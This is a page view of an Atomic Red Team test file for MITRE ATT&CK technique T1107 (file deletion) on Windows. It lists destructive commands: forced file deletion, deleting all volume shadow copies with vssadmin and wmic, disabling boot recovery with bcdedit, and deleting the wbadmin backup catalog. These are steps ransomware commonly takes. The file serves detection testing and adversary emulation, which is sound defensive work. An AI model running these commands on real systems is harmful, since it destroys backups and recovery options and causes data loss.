infosecn1nja
/
atomic-red-team
mirror of https://github.com/infosecn1nja/atomic-red-team.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity
atomic-red-team/Windows/Defense_Evasion/File_Deletion.md

32 lines
473 B
Markdown
Raw Permalink Blame History

This file contains ambiguous Unicode characters!

This file contains ambiguous Unicode characters that may be confused with others in your current locale. If your use case is intentional and legitimate, you can safely ignore this warning. Use the Escape button to highlight these characters.

# File Deletion
MITRE ATT&CK Technique: [T1107](https://attack.mitre.org/wiki/Technique/T1107)
## cmd
del /f filename
rmdir example
## PowerShell
Remove-Item path c:\testfolder recurse
## vssadmin
vssadmin.exe Delete Shadows /All /Quiet
## wmic
wmic shadowcopy delete
## bcdedit
bcdedit /set {default} bootstatuspolicy ignoreallfailures
bcdedit /set {default} recoveryenabled no
## wbadmin
wbadmin delete catalog -quiet
Reference in New Issue View Git Blame Copy Permalink